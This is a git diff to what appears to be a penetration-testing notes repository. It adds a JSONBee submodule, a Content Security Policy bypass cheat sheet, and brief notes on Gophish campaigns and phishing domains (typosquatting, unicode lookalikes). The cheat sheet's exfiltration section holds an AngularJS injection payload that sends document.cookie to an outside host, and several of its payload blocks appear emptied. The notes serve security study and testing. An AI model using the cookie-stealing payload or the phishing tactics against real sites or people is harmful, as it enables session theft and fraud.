diff --git a/.gitmodules b/.gitmodules
index e09a84c..1981ec3 100644
--- a/.gitmodules
+++ b/.gitmodules
@@ -67,3 +67,6 @@
 [submodule "forensics/volatility"]
 path = forensics/volatility
 url = https://github.com/volatilityfoundation/volatility.git
+[submodule "exploit/web/content_security_policy/JSONBee"]
+ path = exploit/web/content_security_policy/JSONBee
+ url = https://github.com/zigoo0/JSONBee.git
diff --git a/exploit/web/content_security_policy/JSONBee b/exploit/web/content_security_policy/JSONBee
new file mode 160000
index 0000000..1a518dd
--- /dev/null
+++ b/exploit/web/content_security_policy/JSONBee
@@ -0,0 +1 @@
+Subproject commit 1a518ddf695ae3093ff637c5958802715e890d88
diff --git a/exploit/web/content_security_policy/content_security_policy.md b/exploit/web/content_security_policy/content_security_policy.md
new file mode 100644
index 0000000..9094c83
--- /dev/null
+++ b/exploit/web/content_security_policy/content_security_policy.md
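Review bot: The new `[submodule "exploit/web/content_security_policy/JSONBee"]` entry records only `path` and `url`, so the commit actually tracked is visible only from the gitlink (`1a518ddf695ae3093ff637c5958802715e890d88` in the next hunk) and `git submodule update --remote` would silently move the checkout to whatever the upstream default branch holds. Because this pulls a third-party repository from a personal GitHub account into the tree, it is worth stating the intended ref in the config itself, e.g. `branch = <upstream-branch>` plus a `# pinned: 1a518ddf… — bump deliberately and review the diff` comment above the entry, so any later move of the pin is an explicit, reviewable change rather than an incidental one. The `https://` URL is the right choice; the entry otherwise matches the shape of the existing `forensics/volatility` block.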
@@ -0,0 +1,52 @@
+# Content Security Policy (CSP)
+
+* Either in HTTP header or inside DOM's HTML
+* [CSP directives](https://content-security-policy.com/#directive)
+* [CSP evaluator](https://csp-evaluator.withgoogle.com/)
+* [Bypassing csp](https://blog.0daylabs.com/2016/09/09/bypassing-csp/)
+
+## Sources
+* `*` wildcard
+* `none`
+* `self` for sources delivered through the same protocol
+ * `default-src 'self';` may not load any script
+* `unsafe-inline`
+* `unsafe-eval`
+* `test.com` loads resources from domain but not subdomains
+* `*.test.com` loads resources from subdomains
+* `data:...` critical usage
+* `nonce` loads if nonce is correct. `sha256`, `sha384`, `sha512`
+ * [style hasher](https://report-uri.com/home/hash)
+
+## Usage
+
+### JSONP
+Find JSONP endpoints through which to use custom callback functions
+* [JSONBee](https://github.com/zigoo0/JSONBee)
+```sh
+">
+```
+
+### Misconfiguration
+Insert payload into `src` attribute
+
+### Exfiltration
+* [Beeceptor](beeceptor.com)
+* Local webserver
+* `connect-src` while Ajax/XHR requests are enabled
+* Disguising as an `image-src` or `media-src` source
+```html
+
+```
+other payloads
+```sh
+
+```
+*
+```sh
+
+
+
+{{$on.curry.call().document.location='https:///' + $on.curry.call().document.cookie}} +
+```
diff --git a/osint/social_engineering/gophish.md b/osint/social_engineering/gophish.md
new file mode 100644
index 0000000..9bc9ef0
--- /dev/null
+++ b/osint/social_engineering/gophish.md
@@ -0,0 +1,12 @@
+# Gophish
+
+* [Repo](https://github.com/gophish/gophish.git)
+
+## Usage
+
+* Create
+ * Send profile
+ * Landing page
+ * Email templates
+ * User groups
+ * New Campaign
diff --git a/osint/social_engineering/phishing_domain.md b/osint/social_engineering/phishing_domain.md
new file mode 100644
index 0000000..5ddf071
--- /dev/null
+++ b/osint/social_engineering/phishing_domain.md
@@ -0,0 +1,5 @@
+# Phishing Domains
+
+* Use an old, unused domain.
+* Typosquatting, register a similar domain.
+* Use similar looking chars from unicode.